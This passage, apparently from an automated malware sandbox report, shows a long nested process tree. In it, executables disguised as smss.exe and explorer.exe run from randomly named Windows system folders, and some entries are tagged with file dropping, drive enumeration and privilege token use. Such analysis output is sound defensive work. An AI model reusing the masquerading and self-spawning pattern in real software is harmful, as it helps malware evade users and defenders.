        19⤵
        
        PID:6788
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        Drops file in System32 directory
        
        PID:5740
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        Drops file in System32 directory
        
        PID:8476
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:8772
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:10116
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:10864
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:11816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        Enumerates connected drives
        
        PID:12924
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:14276
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:17712
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        20⤵
        
        PID:19176
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:16424
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:19648
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:15316
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17832
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:15148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:16196
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:19112
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:14780
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16720
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:14020
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16400
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        Enumerates connected drives
        
        PID:12536
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14072
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17660
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:25492
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:11484
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:12508
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14216
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16604
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:21516
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        
        PID:10640
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:11380
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:12480
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14156
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:17356
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:9672
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:11096
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:3892
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:13636
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:14588
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16824
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:19616
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        
        PID:8220
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:9184
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:9840
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:10520
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:12380
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:13964
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:18136
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Enumerates connected drives
        
        PID:8308
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:8648
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:9944
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:10744
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:11580
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:12724
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:14328
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:17272
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5000
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Enumerates connected drives
        
        PID:5764
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Drops file in System32 directory
        
        PID:5508
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:6824
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:7192
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:7416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        Drops file in System32 directory
        
        PID:8436
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:10064
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        
        PID:10816
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:11708
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:12804
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:14292
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:16592
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        31⤵
        
        PID:18932
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        19⤵
        
        PID:19192
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:16552
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:19164
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:18288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        
        PID:25364
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:15180
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16160
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:19044
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        Enumerates connected drives
        
        PID:14812
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16632
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:23544
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:14120
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:18040
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:12776
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:18108
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        Enumerates connected drives
        
        PID:11556
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:12656
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:14176
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:17588
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        11⤵
        
        PID:10648
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:11412
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        Enumerates connected drives
        
        PID:12444
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:13992
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:19140
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:25784
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        10⤵
        
        PID:9648
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:10192
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:11068
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:12124
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:13552
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:14504
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16868
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:19052
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        9⤵
        
        PID:7424
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:9752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:10416
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:13752
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        Enumerates connected drives
        
        PID:14708
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:16756
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        8⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        
        PID:8104
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:8276
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        Drops file in System32 directory
        
        PID:8604
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:9924
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        Drops file in System32 directory
        
        PID:10684
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        Enumerates connected drives
        
        PID:11440
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        Drops file in System32 directory
        
        PID:12568
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:14028
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        
        PID:17628
      - C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        8⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4724
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        11⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        12⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:6508
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        18⤵
        Enumerates connected drives
        
        PID:2436
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        19⤵
        Drops file in System32 directory
        
        PID:7252
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        20⤵
        
        PID:7756
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        21⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        22⤵
        
        PID:8508
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        23⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        24⤵
        
        PID:10164
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        25⤵
        
        PID:10892
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        26⤵
        Drops file in System32 directory
        
        PID:11888
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        27⤵
        
        PID:12988
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        28⤵
        
        PID:14080
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        29⤵
        
        PID:16840
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        30⤵
        
        PID:21524
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        18⤵
        
        PID:19260
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        17⤵
        
        PID:16704
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        16⤵
        
        PID:14540
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        17⤵
        
        PID:18032
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        15⤵
        
        PID:15212
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:16268
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        14⤵
        
        PID:14844
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        15⤵
        
        PID:16460
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        16⤵
        
        PID:19284
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        13⤵
        
        PID:14232
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:17256
        
        C:\Windows\SysWOW64\cvnveiwhktia\explorer.exe
        
        C:\Windows\system32\cvnveiwhktia\explorer.exe
        12⤵
        Enumerates connected drives
        
        PID:12956
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        13⤵
        
        PID:13316
        
        C:\Windows\SysWOW64\fxechqhryrxh\smss.exe
        
        C:\Windows\system32\fxechqhryrxh\smss.exe
        14⤵
        
        PID:18124
        
